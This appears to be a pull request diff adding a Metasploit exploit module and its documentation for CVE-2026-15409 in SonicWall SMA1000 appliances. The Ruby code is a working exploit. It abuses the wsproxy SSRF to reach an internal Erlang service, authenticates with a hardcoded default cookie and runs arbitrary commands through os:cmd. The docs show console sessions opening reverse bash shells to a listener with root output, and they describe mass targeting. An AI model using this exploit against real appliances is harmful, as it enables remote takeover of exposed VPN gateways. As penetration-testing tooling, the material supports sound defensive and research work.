### PR TITLE
linux/http: Add SonicWall SMA1000 WorkPlace wsproxy SSRF exploit module (CVE-2026-15409)

### DIFF
--- a/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
+++ b/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
@@ -1,114 +1,183 @@
-# SonicWall SMA1000 WorkPlace wsproxy SSRF Remote Command Execution
-
-## Overview
-
-This module exploits **CVE-2026-15409**, a Server-Side Request
-Forgery (SSRF) vulnerability in the SonicWall SMA1000 WorkPlace
-`wsproxy` service.
-
-The vulnerable `wsproxy` service can be abused to proxy WebSocket
-traffic to the internal Erlang distribution service. After
-authenticating using the known Erlang distribution cookie, the module
-invokes `os:cmd/1` through Erlang RPC to execute arbitrary Unix
-commands in the context of the vulnerable SMA service.
-
-The check method follows the same SSRF and Erlang authentication path
-but performs a benign `erlang:node/0` RPC rather than executing an
-operating system command.
-
-## Module Information
-
--   **Module:** `exploit/linux/http/sonicwall_sma1000_wsproxy_rce`
--   **Platform:** Unix
--   **Architecture:** `ARCH_CMD`
--   **Rank:** Excellent
--   **Disclosure Date:** 2026-07-14
-
-### Module Traits
-
-**Reliability**
-
--   Repeatable Session
-
-**Stability**
-
--   Crash Safe
-
-**Side Effects**
-
--   IOC in Logs
-
 ## Vulnerable Application
 
-This module targets SonicWall SMA1000 appliances affected by:
+This module exploits **CVE-2026-15409**, a Server-Side Request Forgery (SSRF)
+vulnerability in the SonicWall SMA1000 WorkPlace `wsproxy` service.
 
--   **CVE-2026-15409**
+The vulnerable `wsproxy` endpoint can be abused to proxy WebSocket traffic to
+the internal Erlang distribution service. After authenticating using the Erlang
+distribution cookie, the module invokes `os:cmd/1` through Erlang RPC to execute
+arbitrary Unix commands in the context of the vulnerable SMA service.
 
-Refer to the SonicWall advisory for affected firmware versions:
+The `check` method follows the same SSRF and Erlang authentication path but
+performs a benign `erlang:node/0` RPC rather than executing an operating system
+command.
 
--   https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008
+### Tested Environment
 
-At the time of publication, SonicWall confirmed active exploitation in
-the wild and the vulnerability has been added to CISA's Known Exploited
-Vulnerabilities (KEV) catalog.
+The module was developed and tested against the following environment:
+
+- SonicWall SMA1000 Virtual Appliance deployed in VMware Workstation.
+- Firmware version 12.5.0 with the affected software version described in SonicWall advisory SNWLID-2026-0008.
+- The WorkPlace service enabled and accessible via the `/wsproxy` endpoint.
+- The exploit path requires the WorkPlace `/wsproxy` service to be operational.
+  In the test environment, configuring Microsoft Active Directory as the authentication service satisfied this prerequisite.
+- The module uses the default Erlang distribution cookie present on affected SMA1000 appliances.
+
+The exploit was successfully developed and validated using the above configuration.
 
 ## Verification Steps
 
-    use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
-    set RHOSTS <target>
-    set TARGETURI /
-    check
+1. Deploy a vulnerable SonicWall SMA1000 appliance.
+2. Configure an authentication service on SonicWall SMA1000 appliance
+3. Start `msfconsole`.
+4. Load the module:
 
-If vulnerable:
+```text
+use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
+```
 
-    set payload cmd/unix/reverse_bash
-    set LHOST <listener>
-    run
+5. Configure the required options:
+
+```text
+set RHOSTS <target>
+set RPORT <port>
+set TARGETURI /wsproxy
+set ERLANG_COOKIE <cookie>
+set LHOST <listener>
+```
+
+6. Verify the target:
+
+```text
+check
+```
+
+7. Exploit the target:
+
+```text
+run
+```
 
 ## Options
 
-The most commonly used options are:
+| Option | Description |
+|--------|-------------|
+| RHOSTS | Target appliance(s). |
+| TARGETURI | SMA WorkPlace base path. |
+| BMID | Bookmark identifier used by the WorkPlace WebSocket session. |
+| ERLANG_COOKIE | Erlang distribution cookie used for authentication. |
+| SERVICE_TYPE | WorkPlace service type (default: SSH). |
+| WSHOST | Internal host supplied to `wsproxy`. |
+| WSPORT | Erlang distribution service port (default: 1050). |
+| WS_READ_TIMEOUT | WebSocket receive timeout. |
 
-  Option            Description
-  ----------------- --------------------------------------------------------------
-  RHOSTS            Target appliance(s).
-  TARGETURI         SMA WorkPlace base path.
-  BMID              Bookmark identifier used by the WorkPlace WebSocket session.
-  ERLANG_COOKIE     Erlang distribution cookie used for authentication.
-  SERVICE_TYPE      WorkPlace service type (default: SSH).
-  WSHOST            Internal host supplied to wsproxy.
-  WSPORT            Erlang distribution service port (default: 1050).
-  WS_READ_TIMEOUT   WebSocket receive timeout.
+## Scenarios
 
-## Check Method
+### SonicWall SMA1000 Virtual Appliance (Firmware 12.5.0)
 
-The `check` method authenticates to the Erlang distribution service and
-performs a benign `erlang:node/0` RPC. No operating system command is
-executed during vulnerability verification.
+```text
+msf6 > use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
 
-## Exploitation
+[*] Using configured payload cmd/unix/reverse_bash
 
-Successful exploitation executes arbitrary operating system commands
-using Erlang `os:cmd/1`.
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set RHOSTS 10.10.10.51
+RHOSTS => 10.10.10.51
 
-Typical payloads include:
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set LHOST 10.10.10.5
+LHOST => 10.10.10.5
 
--   `cmd/unix/generic`
--   `cmd/unix/reverse_bash`
--   `cmd/unix/reverse_netcat`
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > check
 
-## Example
+[+] The target is vulnerable. Authenticated to internal Erlang node couchdb@127.0.0.1; erlang:node/0 returned couchdb@127.0.0.1
 
-    use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > run
 
-    set RHOSTS 10.10.10.51
-    set payload cmd/unix/reverse_bash
-    set LHOST 10.10.10.5
+[*] Started reverse TCP handler on 10.10.10.5:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Authenticated to internal Erlang node couchdb@127.0.0.1; erlang:node/0 returned couchdb@127.0.0.1
+[*] Executing command through Erlang os:cmd/1:
+    bash -c '...'
+[*] Command shell session 1 opened (10.10.10.5:4444 -> 10.10.10.51:19152)
 
-    run
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > sessions -i 1
+
+[*] Starting interaction with 1...
+
+ls -al
+total 140
+drwxr-xr-x  9 root root   4096 Jun 19 17:14 .
+drwxr-xr-x  3 root root   4096 Jun 19 17:14 ..
+-rw-r--r--  1 root root 104255 Aug 23  2025 LICENSE
+drwxr-xr-x  2 root root   4096 Jun 19 17:14 bin
+drwxr-xr-x  5 root root   4096 Jun 19 17:14 erts-13.1.5
+drwxr-xr-x  4 root root   4096 Aug 23  2025 etc
+drwxr-xr-x 52 root root   4096 Jun 19 17:14 lib
+drwxr-xr-x  3 root root   4096 Aug 23  2025 releases
+drwxr-xr-x  3 root root   4096 Aug 23  2025 share
+drwxr-xr-x  3 root root   4096 Aug 23  2025 var
+
+whoami
+couchdb
+
+pwd
+/opt/couchdb
+
+```
+
+### Vulnerability Check
+
+```text
+msf6 > use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set RHOSTS 10.10.10.51
+RHOSTS => 10.10.10.51
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set ERLANG_COOKIE monster
+ERLANG_COOKIE => monster
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > check
+
+[+] 10.10.10.51:8443 - Authenticated to internal Erlang node couchdb@127.0.0.1
+[+] 10.10.10.51:8443 - The target appears to be vulnerable.
+```
+
+### Reverse Shell
+
+```text
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set LHOST 10.10.10.5
+LHOST => 10.10.10.5
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > run
+
+[*] Started reverse TCP handler on 10.10.10.5:4444
+[*] Running automatic check
+[+] The target is vulnerable.
+[*] Executing command through Erlang os:cmd/1
+[*] Command shell session 1 opened (10.10.10.5:4444 -> 10.10.10.51:19152)
+
+id
+uid=0(root) gid=0(root)
+
+uname -a
+Linux localhost ...
+```
+
+### Generic Command Execution
+
+```text
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set PAYLOAD cmd/unix/generic
+PAYLOAD => cmd/unix/generic
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set CMD id
+CMD => id
+msf6 exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > run
+
+[*] Running automatic check
+[+] The target is vulnerable.
+[*] Executing command through Erlang os:cmd/1
+
+uid=0(root) gid=0(root)
+```
 
 ## References
 
--   https://nvd.nist.gov/vuln/detail/CVE-2026-15409
--   https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008
--   https://attackerkb.com/topics/CVE-2026-15409
+* https://nvd.nist.gov/vuln/detail/CVE-2026-15409
+* https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008
+* https://attackerkb.com/topics/CVE-2026-15409

--- a/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
+++ b/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
@@ -65,13 +65,6 @@ If vulnerable:
     set LHOST <listener>
     run
 
-For multiple targets:
-
-    run -z
-
-Using `run -z` allows sessions to be created in the background while
-Metasploit continues processing the remaining hosts.
-
 ## Options
 
 The most commonly used options are:

--- a/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
+++ b/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
@@ -14,16 +14,17 @@ command.
 
 ### Tested Environment
 
-The module was developed and tested against the following environment:
+The module was developed and validated against the following environment:
 
 - SonicWall SMA1000 Virtual Appliance deployed in VMware Workstation.
-- Firmware version 12.5.0 with the affected software version described in SonicWall advisory SNWLID-2026-0008.
+- Appliance version `12.5.0-02002`.
+- Security hotfix `pform-hotfix-12.5.0-02800` installed.
 - The WorkPlace service enabled and accessible via the `/wsproxy` endpoint.
 - The exploit path requires the WorkPlace `/wsproxy` service to be operational.
   In the test environment, configuring Microsoft Active Directory as the authentication service satisfied this prerequisite.
 - The module uses the default Erlang distribution cookie present on affected SMA1000 appliances.
 
-The exploit was successfully developed and validated using the above configuration.
+The above configuration was used to validate successful vulnerability detection and command execution.
 
 ## Verification Steps
 
@@ -73,7 +74,7 @@ run
 
 ## Scenarios
 
-### SonicWall SMA1000 Virtual Appliance (Firmware 12.5.0)
+### SonicWall SMA1000 Virtual Appliance (12.5.0-02002 with pform-hotfix-12.5.0-02800)
 
 ```text
 msf6 > use exploit/linux/http/sonicwall_sma1000_wsproxy_rce

--- a/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
+++ b/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
@@ -1,0 +1,121 @@
+# SonicWall SMA1000 WorkPlace wsproxy SSRF Remote Command Execution
+
+## Overview
+
+This module exploits **CVE-2026-15409**, a Server-Side Request
+Forgery (SSRF) vulnerability in the SonicWall SMA1000 WorkPlace
+`wsproxy` service.
+
+The vulnerable `wsproxy` service can be abused to proxy WebSocket
+traffic to the internal Erlang distribution service. After
+authenticating using the known Erlang distribution cookie, the module
+invokes `os:cmd/1` through Erlang RPC to execute arbitrary Unix
+commands in the context of the vulnerable SMA service.
+
+The check method follows the same SSRF and Erlang authentication path
+but performs a benign `erlang:node/0` RPC rather than executing an
+operating system command.
+
+## Module Information
+
+-   **Module:** `exploit/linux/http/sonicwall_sma1000_wsproxy_rce`
+-   **Platform:** Unix
+-   **Architecture:** `ARCH_CMD`
+-   **Rank:** Excellent
+-   **Disclosure Date:** 2026-07-14
+
+### Module Traits
+
+**Reliability**
+
+-   Repeatable Session
+
+**Stability**
+
+-   Crash Safe
+
+**Side Effects**
+
+-   IOC in Logs
+
+## Vulnerable Application
+
+This module targets SonicWall SMA1000 appliances affected by:
+
+-   **CVE-2026-15409**
+
+Refer to the SonicWall advisory for affected firmware versions:
+
+-   https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008
+
+At the time of publication, SonicWall confirmed active exploitation in
+the wild and the vulnerability has been added to CISA's Known Exploited
+Vulnerabilities (KEV) catalog.
+
+## Verification Steps
+
+    use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
+    set RHOSTS <target>
+    set TARGETURI /
+    check
+
+If vulnerable:
+
+    set payload cmd/unix/reverse_bash
+    set LHOST <listener>
+    run
+
+For multiple targets:
+
+    run -z
+
+Using `run -z` allows sessions to be created in the background while
+Metasploit continues processing the remaining hosts.
+
+## Options
+
+The most commonly used options are:
+
+  Option            Description
+  ----------------- --------------------------------------------------------------
+  RHOSTS            Target appliance(s).
+  TARGETURI         SMA WorkPlace base path.
+  BMID              Bookmark identifier used by the WorkPlace WebSocket session.
+  ERLANG_COOKIE     Erlang distribution cookie used for authentication.
+  SERVICE_TYPE      WorkPlace service type (default: SSH).
+  WSHOST            Internal host supplied to wsproxy.
+  WSPORT            Erlang distribution service port (default: 1050).
+  WS_READ_TIMEOUT   WebSocket receive timeout.
+
+## Check Method
+
+The `check` method authenticates to the Erlang distribution service and
+performs a benign `erlang:node/0` RPC. No operating system command is
+executed during vulnerability verification.
+
+## Exploitation
+
+Successful exploitation executes arbitrary operating system commands
+using Erlang `os:cmd/1`.
+
+Typical payloads include:
+
+-   `cmd/unix/generic`
+-   `cmd/unix/reverse_bash`
+-   `cmd/unix/reverse_netcat`
+
+## Example
+
+    use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
+
+    set RHOSTS 10.10.10.51
+    set payload cmd/unix/reverse_bash
+    set LHOST 10.10.10.5
+
+    run
+
+## References
+
+-   https://nvd.nist.gov/vuln/detail/CVE-2026-15409
+-   https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008
+-   https://attackerkb.com/topics/CVE-2026-15409

--- a/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
+++ b/documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
@@ -61,16 +61,23 @@ run
 
 ## Options
 
-| Option | Description |
-|--------|-------------|
-| RHOSTS | Target appliance(s). |
-| TARGETURI | SMA WorkPlace base path. |
-| BMID | Bookmark identifier used by the WorkPlace WebSocket session. |
-| ERLANG_COOKIE | Erlang distribution cookie used for authentication. |
-| SERVICE_TYPE | WorkPlace service type (default: SSH). |
-| WSHOST | Internal host supplied to `wsproxy`. |
-| WSPORT | Erlang distribution service port (default: 1050). |
-| WS_READ_TIMEOUT | WebSocket receive timeout. |
+### BMID
+Bookmark identifier used by the WorkPlace WebSocket session. 
+
+### ERLANG_COOKIE
+Erlang distribution cookie used for authentication. 
+
+### SERVICE_TYPE 
+WorkPlace service type (default: SSH). 
+
+### WSHOST
+Internal host supplied to `wsproxy`. 
+
+### WSPORT 
+Erlang distribution service port (default: 1050). 
+
+### WS_READ_TIMEOUT 
+WebSocket receive timeout. 
 
 ## Scenarios
 

--- a/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
+++ b/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
@@ -1,0 +1,565 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'base64'
+require 'digest'
+require 'securerandom'
+require 'timeout'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  ETF_VERSION = 131
+  SMALL_INTEGER_EXT = 97
+  INTEGER_EXT = 98
+  ATOM_EXT = 100
+  REFERENCE_EXT = 101
+  PID_EXT = 103
+  SMALL_TUPLE_EXT = 104
+  NIL_EXT = 106
+  STRING_EXT = 107
+  LIST_EXT = 108
+  BINARY_EXT = 109
+  ATOM_UTF8_EXT = 118
+  SMALL_ATOM_UTF8_EXT = 119
+  NEW_PID_EXT = 88
+  NEWER_REFERENCE_EXT = 90
+
+  DFLAG_EXTENDED_REFERENCES = 0x00000004
+  DFLAG_FUN_TAGS = 0x00000010
+  DFLAG_NEW_FUN_TAGS = 0x00000080
+  DFLAG_EXTENDED_PIDS_PORTS = 0x00000100
+  DFLAG_EXPORT_PTR_TAG = 0x00000200
+  DFLAG_BIT_BINARIES = 0x00000400
+  DFLAG_NEW_FLOATS = 0x00000800
+  DFLAG_UTF8_ATOMS = 0x00010000
+  DFLAG_MAP_TAG = 0x00020000
+  DFLAG_BIG_CREATION = 0x00040000
+  DFLAG_HANDSHAKE_23 = 0x01000000
+
+  DIST_FLAGS = DFLAG_EXTENDED_REFERENCES |
+               DFLAG_FUN_TAGS |
+               DFLAG_NEW_FUN_TAGS |
+               DFLAG_EXTENDED_PIDS_PORTS |
+               DFLAG_EXPORT_PTR_TAG |
+               DFLAG_BIT_BINARIES |
+               DFLAG_NEW_FLOATS |
+               DFLAG_UTF8_ATOMS |
+               DFLAG_MAP_TAG |
+               DFLAG_BIG_CREATION |
+               DFLAG_HANDSHAKE_23
+
+  SmaReadyFrame = "\x0b\x00\x00\x00\x00".b
+
+  Pid = Struct.new(:node, :ident, :serial, :creation)
+  Reference = Struct.new(:node, :ident, :creation)
+
+  class SmaWebSocketTransport
+    def initialize(wsock, read_timeout, verbose_proc = nil)
+      @wsock = wsock
+      @read_timeout = read_timeout
+      @verbose_proc = verbose_proc
+      @recv_buffer = ''.b
+      consume_ready_frame
+    end
+
+    def sendall(data)
+      # The SMA Connect Agent protocol sends base64 data in WebSocket text frames.
+      @wsock.put_wstext(Base64.strict_encode64(data))
+    end
+
+    def recv(size)
+      while @recv_buffer.bytesize < size
+        message = read_message
+        break if message.nil?
+
+        @recv_buffer << message
+      end
+
+      result = @recv_buffer.byteslice(0, size) || ''.b
+      @recv_buffer = @recv_buffer.byteslice(size..) || ''.b
+      result
+    end
+
+    def close
+      @wsock.wsclose
+    rescue StandardError
+      nil
+    end
+
+    private
+
+    def consume_ready_frame
+      message = read_message(timeout: 1, allow_timeout: true)
+      return if message.nil?
+
+      if message == MetasploitModule::SmaReadyFrame
+        @verbose_proc&.call('Received SMA ready frame')
+      else
+        @recv_buffer << message
+      end
+    end
+
+    def read_message(timeout: @read_timeout, allow_timeout: false)
+      Timeout.timeout(timeout) do
+        loop do
+          frame = @wsock.get_wsframe
+          return nil if frame.nil?
+
+          opcode = frame.header.opcode
+          payload = frame.payload_data.to_s.b
+
+          case opcode
+          when Rex::Proto::Http::WebSocket::Opcode::TEXT,
+               Rex::Proto::Http::WebSocket::Opcode::BINARY
+            return payload
+          when Rex::Proto::Http::WebSocket::Opcode::PING
+            pong = Rex::Proto::Http::WebSocket::Frame.new(
+              header: { opcode: Rex::Proto::Http::WebSocket::Opcode::PONG }
+            )
+            pong.payload_len = payload.bytesize
+            pong.payload_data = payload
+            pong.mask!
+            @wsock.put_wsframe(pong)
+          when Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
+            return nil
+          end
+        end
+      end
+    rescue Timeout::Error
+      return nil if allow_timeout
+
+      raise Rex::TimeoutError, 'Timed out waiting for WebSocket data'
+    end
+  end
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SonicWall SMA1000 WorkPlace wsproxy SSRF Remote Command Execution',
+        'Description' => %q{
+          This module exploits a Server-Side Request Forgery (SSRF)
+          vulnerability in the SonicWall SMA1000 WorkPlace wsproxy service to
+          access the internal Erlang distribution service.
+
+          After authenticating using the known Erlang distribution cookie, the
+          module invokes os:cmd/1 through Erlang RPC to execute arbitrary Unix
+          commands in the context of the vulnerable SMA service.
+
+          The check method performs a benign Erlang node RPC rather than
+          executing an operating system command.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ryan Emmons', # Original Python PoC research and development
+          'Deral Heiland', # Metasploit module testing and development
+          'Rapid7 Vulnerability Research'
+        ],
+        'References' => [
+          ['CVE', '2026-15409'],
+          ['URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008']
+        ],
+        'DisclosureDate' => '2026-07-14',
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'PAYLOAD' => 'cmd/unix/reverse_bash',
+          'WfsDelay' => 10
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'SMA WorkPlace base path', '/']),
+        OptString.new('WSHOST', [true, 'Internal host supplied to wsproxy', '0.0.0.0']),
+        OptPort.new('WSPORT', [true, 'Internal Erlang distribution service port', 1050]),
+        OptString.new('BMID', [true, 'Bookmark identifier beginning with -3389', '-3389c1b25ccd']),
+        OptString.new('SERVICE_TYPE', [true, 'wsproxy service type', 'SSH']),
+        OptString.new('ORIGIN', [false, 'WebSocket Origin header; generated automatically when empty', '']),
+        OptString.new('WS_USER_AGENT', [true, 'WebSocket User-Agent header', 'SMA Connect Agent']),
+        OptString.new('ERLANG_COOKIE', [true, 'Erlang distribution cookie', '10ecad5b446e86864832904cd439b6b70262']),
+        OptString.new('NODE_NAME', [false, 'Erlang client node name; generated automatically when empty', '']),
+        OptInt.new('WS_READ_TIMEOUT', [true, 'Seconds to wait for WebSocket protocol data', 10])
+      ]
+    )
+  end
+
+  def websocket_uri
+    query = "bmID=#{Rex::Text.uri_encode(datastore['BMID'])}" \
+            "&serviceType=#{Rex::Text.uri_encode(datastore['SERVICE_TYPE'])}" \
+            "&host=#{Rex::Text.uri_encode(datastore['WSHOST'])}" \
+            "&port=#{datastore['WSPORT']}"
+
+    "#{normalize_uri(target_uri.path, 'wsproxy')}?#{query}"
+  end
+
+  def websocket_origin
+    return datastore['ORIGIN'] unless datastore['ORIGIN'].blank?
+
+    scheme = ssl ? 'https' : 'http'
+    default_port = ssl ? 443 : 80
+    authority = vhost
+    authority = "#{authority}:#{rport}" unless rport == default_port
+    "#{scheme}://#{authority}"
+  end
+
+  def erlang_node_name
+    return datastore['NODE_NAME'] unless datastore['NODE_NAME'].blank?
+
+    "msf_#{Rex::Text.rand_text_numeric(6)}@127.0.0.1"
+  end
+
+  def connect_sma_websocket
+    vprint_status("Connecting to #{websocket_uri}")
+    vprint_status("Origin: #{websocket_origin}")
+    vprint_status("Internal destination: #{datastore['WSHOST']}:#{datastore['WSPORT']}")
+
+    wsock = connect_ws(
+      'method' => 'GET',
+      'uri' => websocket_uri,
+      'headers' => {
+        'Origin' => websocket_origin,
+        'User-Agent' => datastore['WS_USER_AGENT'],
+        'Sec-WebSocket-Protocol' => 'binary'
+      }
+    )
+
+    vprint_good('WebSocket upgrade succeeded')
+    SmaWebSocketTransport.new(wsock, datastore['WS_READ_TIMEOUT'], proc { |message| vprint_status(message) })
+  end
+
+  def recv_exact(sock, size)
+    buffer = ''.b
+    while buffer.bytesize < size
+      chunk = sock.recv(size - buffer.bytesize)
+      raise EOFError, 'Peer closed the connection' if chunk.nil? || chunk.empty?
+
+      buffer << chunk
+    end
+    buffer
+  end
+
+  def send_handshake_packet(sock, payload)
+    sock.sendall([payload.bytesize].pack('n') + payload)
+  end
+
+  def recv_handshake_packet(sock)
+    size = recv_exact(sock, 2).unpack1('n')
+    recv_exact(sock, size)
+  end
+
+  def send_dist_packet(sock, payload)
+    sock.sendall([payload.bytesize].pack('N') + payload)
+  end
+
+  def recv_dist_packet(sock)
+    size = recv_exact(sock, 4).unpack1('N')
+    return ''.b if size.zero?
+
+    recv_exact(sock, size)
+  end
+
+  def erlang_digest(cookie, challenge)
+    Digest::MD5.digest("#{cookie}#{challenge}")
+  end
+
+  def parse_challenge(payload)
+    case payload.byteslice(0, 1)
+    when 'N'
+      raise ArgumentError, 'Short new-style Erlang challenge packet' if payload.bytesize < 19
+
+      flags, challenge, creation, name_length = payload.byteslice(1, 18).unpack('Q>NNn')
+      name = payload.byteslice(19, name_length).to_s
+      [flags, challenge, creation, name]
+    when 'n'
+      raise ArgumentError, 'Short old-style Erlang challenge packet' if payload.bytesize < 11
+
+      _version, flags, challenge = payload.byteslice(1, 10).unpack('nNN')
+      name = payload.byteslice(11..).to_s
+      [flags, challenge, 0, name]
+    else
+      raise ArgumentError, "Unexpected Erlang challenge tag: #{payload.byteslice(0, 1).inspect}"
+    end
+  end
+
+  def etf_atom(value)
+    data = value.to_s.b
+    if data.bytesize <= 255
+      [SMALL_ATOM_UTF8_EXT, data.bytesize].pack('CC') + data
+    else
+      [ATOM_UTF8_EXT, data.bytesize].pack('Cn') + data
+    end
+  end
+
+  def etf_small_int(value)
+    raise ArgumentError, 'Small integer is outside the range 0..255' unless value.between?(0, 255)
+
+    [SMALL_INTEGER_EXT, value].pack('CC')
+  end
+
+  def etf_string(value)
+    data = value.to_s.b
+    raise ArgumentError, 'ETF STRING_EXT exceeds 65535 bytes' if data.bytesize > 65_535
+
+    [STRING_EXT, data.bytesize].pack('Cn') + data
+  end
+
+  def etf_nil
+    [NIL_EXT].pack('C')
+  end
+
+  def etf_tuple(*items)
+    raise ArgumentError, 'Tuple arity exceeds SMALL_TUPLE_EXT capacity' if items.length > 255
+
+    [SMALL_TUPLE_EXT, items.length].pack('CC') + items.join
+  end
+
+  def etf_list(items)
+    [LIST_EXT, items.length].pack('CN') + items.join + etf_nil
+  end
+
+  def etf_pid(pid)
+    [PID_EXT].pack('C') + etf_atom(pid.node) + [pid.ident, pid.serial, pid.creation].pack('NNC')
+  end
+
+  def decode_etf(data, offset = 0)
+    raise ArgumentError, 'Unexpected end of ETF data' if offset >= data.bytesize
+
+    tag = data.getbyte(offset)
+    offset += 1
+    return decode_etf(data, offset) if tag == ETF_VERSION
+
+    case tag
+    when SMALL_INTEGER_EXT
+      [data.getbyte(offset), offset + 1]
+    when INTEGER_EXT
+      [data.byteslice(offset, 4).unpack1('l>'), offset + 4]
+    when ATOM_EXT, ATOM_UTF8_EXT
+      length = data.byteslice(offset, 2).unpack1('n')
+      offset += 2
+      [data.byteslice(offset, length).to_s, offset + length]
+    when SMALL_ATOM_UTF8_EXT
+      length = data.getbyte(offset)
+      offset += 1
+      [data.byteslice(offset, length).to_s, offset + length]
+    when STRING_EXT
+      length = data.byteslice(offset, 2).unpack1('n')
+      offset += 2
+      [data.byteslice(offset, length).to_s, offset + length]
+    when BINARY_EXT
+      length = data.byteslice(offset, 4).unpack1('N')
+      offset += 4
+      [data.byteslice(offset, length).to_s.b, offset + length]
+    when NIL_EXT
+      [[], offset]
+    when SMALL_TUPLE_EXT
+      arity = data.getbyte(offset)
+      offset += 1
+      values = []
+      arity.times do
+        value, offset = decode_etf(data, offset)
+        values << value
+      end
+      [values.freeze, offset]
+    when LIST_EXT
+      length = data.byteslice(offset, 4).unpack1('N')
+      offset += 4
+      values = []
+      length.times do
+        value, offset = decode_etf(data, offset)
+        values << value
+      end
+      tail, offset = decode_etf(data, offset)
+      values << [:tail, tail] unless tail == []
+      [values, offset]
+    when PID_EXT
+      node, offset = decode_etf(data, offset)
+      ident, serial = data.byteslice(offset, 8).unpack('NN')
+      offset += 8
+      creation = data.getbyte(offset)
+      [Pid.new(node, ident, serial, creation), offset + 1]
+    when NEW_PID_EXT
+      node, offset = decode_etf(data, offset)
+      ident, serial, creation = data.byteslice(offset, 12).unpack('NNN')
+      [Pid.new(node, ident, serial, creation), offset + 12]
+    when REFERENCE_EXT
+      node, offset = decode_etf(data, offset)
+      ident = data.byteslice(offset, 4).unpack1('N')
+      offset += 4
+      creation = data.getbyte(offset)
+      [Reference.new(node, ident, creation), offset + 1]
+    when NEWER_REFERENCE_EXT
+      length = data.byteslice(offset, 2).unpack1('n')
+      offset += 2
+      node, offset = decode_etf(data, offset)
+      creation = data.byteslice(offset, 4).unpack1('N')
+      offset += 4
+      identifiers = []
+      length.times do
+        identifiers << data.byteslice(offset, 4).unpack1('N')
+        offset += 4
+      end
+      [[:reference, node, creation, identifiers], offset]
+    else
+      raise ArgumentError, "Unsupported ETF tag #{tag} at offset #{offset - 1}"
+    end
+  end
+
+  def rpc_call(sock, node_name, erlang_module, function, arguments)
+    sender_pid = Pid.new(node_name, 1, 0, 0)
+    request = etf_tuple(
+      etf_pid(sender_pid),
+      etf_tuple(
+        etf_atom('call'),
+        etf_atom(erlang_module),
+        etf_atom(function),
+        etf_list(arguments),
+        etf_atom('user')
+      )
+    )
+    control = etf_tuple(
+      etf_small_int(6),
+      etf_pid(sender_pid),
+      etf_atom('nocookie'),
+      etf_atom('rex')
+    )
+
+    send_dist_packet(sock, [112, ETF_VERSION].pack('CC') + control + [ETF_VERSION].pack('C') + request)
+
+    loop do
+      packet = recv_dist_packet(sock)
+      next if packet.empty?
+      raise "Unexpected distribution packet type #{packet.getbyte(0)}" unless packet.getbyte(0) == 112
+
+      control_term, offset = decode_etf(packet, 1)
+      message_term, = decode_etf(packet, offset)
+
+      next unless control_term.is_a?(Array) && control_term[0] == 2
+      next unless message_term.is_a?(Array) && message_term.length == 2 && message_term[0] == 'rex'
+
+      return message_term[1]
+    end
+  end
+
+  def erlang_connect_and_rpc(erlang_module, function, arguments)
+    sock = connect_sma_websocket
+    node_name = erlang_node_name
+    node_name_data = node_name.b
+
+    vprint_status("Using Erlang node name #{node_name}")
